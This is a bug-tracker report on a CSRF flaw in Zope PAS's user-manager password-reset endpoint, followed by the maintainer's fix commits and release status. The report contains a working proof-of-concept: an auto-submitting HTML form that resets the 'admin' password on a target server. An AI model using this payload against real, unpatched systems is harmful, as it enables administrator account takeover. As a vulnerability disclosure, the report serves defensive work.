Zope PAS

userManager manage_updateUserPassword csrf

Bug #1079204 reported by Thomas on 2012-11-15

256

This bug affects 1 person

Affects		Status	Importance	Assigned to	Milestone
	Zope PAS	Fix Released	Undecided	Tres Seaver

Bug Description

Following html allows the admin passwd to be reset :

<html>
  <body>
<form action="https://SERVER/acl_users/userManager/manage_updateUserPassword" method="post" name="form">
user_id : <input value="admin" name="user_id">
  <br>
  password: <input value="zenoss26" name="password">
  <br>
  confirm :<input value="zenoss26" name="confirm">
  <br>
<input type="submit">
</form>
<script>
document.forms["form"].submit();
</script>
  </body>
</html>

Tres Seaver (tseaver) on 2012-11-15

Changed in zope-pas:
assignee:	nobody → Tres Seaver (tseaver)
status:	New → Confirmed

Revision history for this message

Tres Seaver (tseaver) wrote on 2012-11-16:

#1

I have checked in CSRF protection for the ZODBUserManager,
ZODBRoleManager, ZODBGroupManager, and DynamicGroupsPlugin
plugins:

http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128301&view=rev

http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128302&view=rev

http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128303&view=rev

http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128304&view=rev

http://svn.zope.org/Products.PluggableAuthService/trunk/?rev=128305&view=rev

I have verified that your exploit is now blocked.

Changed in zope-pas:
status:	Confirmed → Fix Committed

Tres Seaver (tseaver) on 2014-01-08

Changed in zope-pas:
status:	Fix Committed → Fix Released
information type:	Private Security → Public Security

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.